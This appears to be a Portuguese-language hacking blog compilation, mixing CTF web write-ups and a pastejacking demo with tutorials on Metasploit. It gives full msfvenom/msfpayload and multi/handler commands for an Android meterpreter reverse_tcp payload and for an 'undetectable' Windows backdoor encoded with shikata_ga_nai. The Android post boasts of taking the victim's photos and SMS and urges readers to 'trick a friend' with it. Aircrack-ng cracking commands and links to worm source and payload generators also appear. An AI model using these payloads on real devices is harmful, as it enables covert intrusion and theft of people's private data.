CTF-H4K - ABIN X ISIS - WEB30 [Write-Up]

Fala pessoal bem vindos á mais um Write-up, e dessa vez trazendo aqui um desafio WEB.

site: Sucuri CTF
evento: ABIN X ISIS
software: Cookie Manager, PYTHON
script:  web30


DESC:

Ao acessar o site tínhamos:

Ao olhar o código fonte não tinha nada de mais:

Tinhamos então ai uma imagem "vs.png" redirecionando para um arquivo "win.php".




Ao acessar a imagem, fomos redirecionado para o "win.php", onde tinha a mensagem: "ABIN WIN"

E como na descrição o objetivo era fazer o ISIS vencer,  tínhamos que achar algum jeito de mudar isto, então depois fui ver os cookies e tinha um com o nome muito suspeito: "estadoislamico"

E em seu valor tinha um BASE64, cujo traduzindo: "false".

então estava na cara que para vencer teríamos que alterar isto, mudando para "true" e depois encodando em BASE64.

Apos isto foi só altera o valor do cookie "estadoislamico", e salvar.

Após ter salvo o cookie, era só acessar o "win.php", ou clicar na imagem.

E eles nos retorna a mensagem "TERRORISTA WIN", mas ai você se pergunta, cadê a flag ??

Era só dar uma olhada no código fonte:

E ae está a FLAG, agora para quem não tem ai o Cookie Manager instalado no seu Navegador, eu escrevi um script em Python que faz todo esse processo apenas executando ele.

FLAG:SHC{Br4s1l_D0wn_0limpi4d4s}

Write-Up: Bloco-de-notas [WEB500] - ShellterLabs-SucuriHC

Iae pessoal, Jonatas FIL[ Ninj4 ] na área, e dessa vez vou mostrar o Write-Up de um Evento que joguei recentemente.

SucuriHC - ShellterLabs

Bloco-de-notas - WEB500
---------------------------------------------------------------------
Descrição:

Bloco de Notas
-------------
[PT-BR] |
-------------
Achei essas senhas no bloco de notas e o link para adm do site! 

Usuário: ѷз 
Senha:Ü‹©ƒÖ¾ÅŽÓœÕ½È°»¹ÝšÔ 

https://ctf.sucurihc.org/flags/web50 
---------
[EN] |
---------
Found this passwords in a notepad file and the link to site administration! 

Username: ѷз 
Password:Ü‹©ƒÖ¾ÅŽÓœÕ½È°»¹ÝšÔ 

https://ctf.sucurihc.org/flags/web50 (100 points)
-------------------------------------------------------------------

Pra quem quiser brincar:

https://shellterlabs.com/pt-br/ctf-master/sucuri-hc-ctf-master/i-am-ctf-bitch
-------------------------------------------------------------------------------
Ok, vamos lá.

O desafio tratava-se de uma breve descrição com Login e Senha e a URL do Painel Administrativo.
Como podemos ver os dados de login são meio esquisitos, podemos dizer que podem ser dados encriptados.

Ao abrir o site ele aparecia a seguinte tela:

ao tentar logar com os dados ele mostrava uma frase de um trecho de uma música do MC Hackudao.

Então por ser um desafio WEB pensei em olhar a source do site, e então me deparei com uma função estranha, cujo tinha algumas palavras suspeitas.

Eu revirei o código inteiro e não achei nada de tão importante, então eu resolvi voltar naquela função e tentar entender como funcionava.

Até que percebi que aquilo poderia/era uma Criptografia, então pesquisei na Internet algo relacionado com Criptografia com Javascript, até que me deparei com algo muito parecido com a função.

Tratava-se de um Encriptador/Descriptador em Javascipt cujo funcionava a partir de uma KEY.

Então copiei o código e em "ch = ", eu coloquei a Chave que achei na função Tadezoera, "ToHaCkIaNdOtOdOmUnDo!"

Após isto eu salvei o Script como HTML e abri ele no meu navegador.

Depois disto fui no campo criptografia e colei o Usuário criptografado e dei um enter, e ele me trouxe o seguinte usuário: "boot"

Depois fiz o mesmo com a Senha, e ele me trouxe a seguinte hash: "mCH@kud@oMandaNdoVe".

Após isto, só fui logar no Painel com os dados obtidos e ele nos voltou com o alert com a FLAG.

FLAG: SHC{F@laMalM@isContinuajogandoCTFCuzao}

By Ninj4

Script: http://pastebin.com/nFEEgDgH

DEMO - Reflected XSS Attack

                       DEMO - Reflected XSS Attack

Veja um vídeo demonstrando o ataque: "Reflected XSS"

IEE 802.11 - Decrypt Traffic

                     IEE 802.11 - Decrypt Traffic

                   

Vídeo:

----------------------------------------------------------------------------------------------------------------------

-----------------------------------------------------------------------------------------------------------------------

Comandos:

$ aircrack-ng flag.pcap -w /usr/share/john/password.lst

$ airdecap-ng -p starbuck flag.pcap -e X

Downloads:

https://www.wireshark.org/download.html

http://www.openwall.com/wordlists/

http://www.aircrack-ng.org/downloads.html

http://www.aircrack-ng.org/doku.php?id=airdecap-ng

PasteJacking: Introdução e Prática [PT-BR]

Olá pessoal, bem vindos !!!

Desta vez vou estar demonstrando uma falha que está ficando popular.

                                   "PASTEJACKING".

Pelo nome já dá pra saber que tem algo haver com copiar/colar.

Este ataque acontece quando o Hacker usa a TAG <spam> para adicionar comandos externos.

No caso vou demonstrar utilizando o HTML:

Script: http://pastebin.com/q7M5v3KS

Como vocês podem ver existe toda uma função para este ataque, no caso <pre> é o texto que será exibido, e <spam> será os
Comandos que vão ser executados via bash no Linux/SO


No caso o código que criei, ele vai executar comandos como "echo", "sleep", "clear".

Este ataque é perigoso pois dependendo do hacker ele pode estar ae adcionando um WGET pra você baixar a backdoor dele,

E depois estar executando sem que você perceba.

No caso eu Coloquei um comando "git clone" aleatorio só pra demonstrar.

Vamos lá ver então.

Agora vou estar demonstrando á vitima:

A vitima inocente vai baixar alguma coisa por linha de comando e sem querer acaba caindo em PasteJacking.

Como você puderam ver eu executei comandos externos apenas utilizando um <spam>, como  se fosse um comentário.

"LEMBREM SE PESSOAL, MUITO CUIDADO AO COPIAR COISAS QUE NÃOS SEJAM DE SITES CONFIAVEIS".

FLW <3

[Venom.sh] - Criação de ShellCode

 =============================================================

Iae galera, hoje irei mostrar a ferramenta Venom.SH, que foi criada em shell script pelo PedroUbuntu.

                 

      (Por Jonatas Fil)                         

Name: VENOM - shellcode generator 1.0.8
Link: http://sourceforge.net/p/crisp-shellcode-generator/wiki/Home/
Author: peterubuntu10@sourceforge.net [ r00t-3xp10it ]
HomePage: http://sourceforge.net/u/peterubuntu10/profile/
Suspicious-Shell-Activity (SSA) RedTeam develop @2016
================================================================================

[COMO FUNCIONA O VENOM.SH]

O script usará o msfvenom (metasploit) para gerar shellcode
em formatos diferentes (c | python | ruby | dll | msi | hta-PSH)
Introduzindo o shellcode gerado em uma função (exemplo: python)
"a função do órgão python irá executar o shellcode na RAM" e uso de
compiladores como: gcc (compilador gnu) ou mingw32 ou pyinstaller
para construir o arquivo executável, também inicia um multi-manipulador para receber
a conexão remota (shell inversa ou sessão meterpreter).
.
O gerador de shellcode "A ferramenta reproduz algumas das técnicas utilizadas
por ferramentas como Veil-Evasion, unicorn.py, powersploit, etc, etc, etc ..
=================================================================================
                             
Vídeo:

        

Hijacking: Explicações [Vídeo+Artigo]

Fala ae galera hoje venho aqui trazer um vídeo+artigo, sobre o termo Hijacking.

Porquê eu escolhi esse termo ?

Eu achei bem interessante está tecnica, e achei que  muitos não conhecem, entãor esolvi trazer um vídeo explicando, usei fontes boas e seguras, desculpem este foi um dos meus primeiros vídeos narrando.

Veja agora dicas de comos e proteger, como remover, como funciona:

 

 

 

                                           ARTIGO:

Oque é hijacking ?

é um sequestro de sessão.

Existem muitos Malwares. spywares e outros, um destes terríveis invasores se chama hijack.
O hijacking vem da palavra "hijacker" vem de "sequestro,sequestradores", o sentido real
do termo hijack é isso mesmo

Como funciona ?

Estes programas entram em seu computador sem você perceber,
utilizando controles ActiveX e brechas na segurança.
Assim, modificam o registro do Windows
 “seqüestrando” o seu navegador e modificando a página inicial dele.
Depois aparecem novas barras e botões, e páginas abrem sem parar na tela,
contra a sua vontade.

Por quê ?

Todas estas coisas que são alteradas em seu navegador normalmente linkam
 para publicidade e,na maioria das vezes, têm inclusive pornografia envolvida.
E quem sai ganhando com esta invasão em seu PC é o desenvolvedor deste Hijack,
já que ele é pago por cada vez que estas páginas com publicidade são abertas.

Removendo e evitando: 

E é claro que eles são “grudentos”,
pois dificilmente você consegue remover alguns deles.
Como evitar ou acabar com eles?

Uma dica muito boa para evitar, é entrar em sites seguros, habilitar o pop-ups.

 1º) Sugestão da própria Microsoft, é a utilização da Ferramenta de Remoção de Software Mal-intencionado, que pode ajudar a detectar alguns tipos de software de sequestro, mas não todos;

2º) Os programas mais recomendados são o Malwarebytes Anti-Malware e o ADW Cleaner (download também possível aqui), que são programas grátis.
Após fazer o download e instalar o software em sua máquina, execute os programas e faça uma limpeza completa na máquina, lembrando-se de fechar os navegadores em execução.

Para evitar irei deixar um link do tecmundo com dicas para ver se o site é confiavél,
e tutoriais para remover.

Fonte:

http://www.tecmundo.com.br/spyware/212-o-que-e-hijack-.htm
http://www.tecmundo.com.br/seguranca/1194-10-dicas-para-descobrir-se-um-site-e-confiavel.htm?utm_source=SaibaMais&utm_medium=TecMundo
http://www.emersonwendt.com.br/2014/03/o-que-sao-como-se-prevenir-e-como.html
https://en.wikipedia.org/wiki/Hijacking
https://securitcrs.wordpress.com/hacking/10-session-hijacking/
http://andeons.com/paginas-falsas-de-banco-cuidado-voce-esta-sendo-vitima-de-golpe/
https://www.owasp.org/index.php/Session_hijacking_attack

Metasploit: invadindo sistema Android ( reverse_tcp ) com [Msfvenon]/[Msfpayload]

Ae galera, hoje eu fiz minha primeira invasao no Android utilizando o Metasploit.

Foi simples, primeiro criei um payload usando o modulo meterpreter/reverse_tcp.

apos isto eu mandei o payload para vitima no caso meu celular.

apos isto eu iniciei o exploit.

exploit/multi/handler

setei o payload que usei ( android/meterpreter/reverse_tcp )

configurei a porta e o IP local, e dei um exploit, apos isto foi so a vitima abrir o payload, e BOMBA, a sessao abriu utilizando o meterpreter.

Com ele ativo, consegui tirar fotos, capturar fotos, SMS, execuçao de programas, baixar arquivos.

Fantastico, voce que quer engana um amigo seu segue a dica ;)

comandos que eu uitlizei:

msfvenon or msfpayload -p android/meterpreter/reverse_tcp LHOST=seuip LPORT=4444(DEFAULT) R > nome do aquivo.apk

 

ele vai estar no diretorio principal, de um "ls".

apos isto mande o payload para vitima.

abra o MSFCONSOLE.

comandos:

use exploit/multi/handler

set PAYLOAD android/meterpreter/reverse_tcp

agora configure sua LHOST dnv

set LHOST seuip

apos isto de um "exploit"

Quando a vitima abrir seu payload ira abrir a sessao e ae voce da um help, e agora so brincar com seu amigo >:D

 

fotos:

 

 

Phishing

Iae galera, hoje vim mostrar uma apostila para novatos que criei pelo pedido do Alexandre.

Tema: Phishing.

Nela contem;


Oque seria phising ?;

Como se prevenir ?;

Metodos;

Pratica ;

Qualquer erro me desculpe.

Lançarei uma video-aula de phishing para ajudar voces na pratica.



Download  ( Ela foi criada no Linux, mude a extensao ou baixe um leitor. )

Criada por: Jonatas Rockefeller.

Metasploit: criando payload indetectavel.

Ola a todos, hoje vou mostrar um tutorial de como criar um payload indetectavel.
( So para avisar este tutorial foi baseado em outro "https://pentestlab.wordpress.com/2012/04/16/creating-an-undetectable-backdoor/")

Criando Payload e encodando.

Executando o Exploit.

Quando a vitima acessar o payload vai abrir o meterpreter.

Comandos:

msfpayload windows/meterpreter/reverse_tcp LHOST=[IP LOCAL] LPORT=4555 R| msfencode -e x86/shikata_ga_nai -t raw -a x86 -b '\x00\x0a\x0d' -c 1 X> /diretorio/aquivo.bin,exe,jpg

use exploit/multi/handler      [exploit]
set PAYLOAD windows/meterpreter/reverse_tcp   [payload]
set LHOST              [Ip Local]
exploit      

Explicaçoes:

Oque seria um payload ?



Oque seria MSFencode ?

msfencode – um codificador interactivo de payload encoder


Oque seria o Meterpreter ?

Editado por: Jonatas Rockefeller

Worm: Oque seria ?, Como funciona? e um exemplo em C

Ola a todos, hoje irei mostrar uma mini-apostila em PDF, dando uma basica explicaçao sobre o termo "WORM"

Na apostila vai estar a source do worm em C

Download

Confira o Video:

Ejacoolas: criando payload em java.

Iae galera, nesta vez irei mostrar um script muito util.

ele se chama Ejacoolas, ele cria um payload que usa o modulo reverse_tcp

Primeiro abra ele.

Apos abri-lo, iremos digitar o nome do payload:

Agora aperte ENTER, mais se ele nao identificar, voces coloquem o IP local de voces:

Agora vamos selecionar a porta, no caso a default.

Apos isto o programa ira gerar o payload, voce tera que mandar o paylaod para alguma vitima, quando ela abrir voce tera alguns privilegios sobre a maquina da vitima.

Download

Feito por: Jonatas Rockefeller.

Sniffando com Wireshark [ Windows/Linux ]

Oque é Sniff?

Sniffing, em rede de computadores, é o procedimento realizado por uma ferramenta conhecida como Sniffer (também conhecido como Packet Sniffer, Analisador de Rede,Analisador de Protocolo, Ethernet Sniffer em redes do padrão Ethernet ou ainda Wireless Sniffer em redes wireless). Esta ferramenta, constituída de um software ouhardware, é capaz de interceptar e registrar o tráfego de dados em uma rede de computadores. Conforme o fluxo de dados trafega na rede, o sniffer captura cada pacote e eventualmente decodifica e analisa o seu conteúdo de acordo com o protocolo definido em um RFC ou uma outra especificação.

O sniffing pode ser utilizado com propósitos maliciosos por invasores que tentam capturar o tráfego da rede com diversos objetivos, dentre os quais podem ser citados, obter cópias de arquivos importantes durante sua transmissão, e obter senhas que permitam estender o seu raio de penetração em um ambiente invadido ou ver as conversações em tempo real.

Oque iremos usar ?

Wireshark

Plataforma: Windows/ Linux

Para começar:

iremos abrir o Wireshark, e em Seguida selecionar nossa placa de rede.

Após selecionar a rede, vamos em Start.

Ele irá capturar protocolos, informações sobre oque você está acessando.

Agora no campo Filter, iremos colocar "dns", ele trará todos DNS executados.

Agora iremos abrir o Prompt de Comando e iremos digitar:

$ nslookup
$ host/ip do site que vocêr quer obter informações.

Após digitar, o Wireshark irá mostrar as informações da host que você capturou.

Isto é apenas uma demonstração básica.

Download do Wireshark

feito por: Jonatas Rockefeller.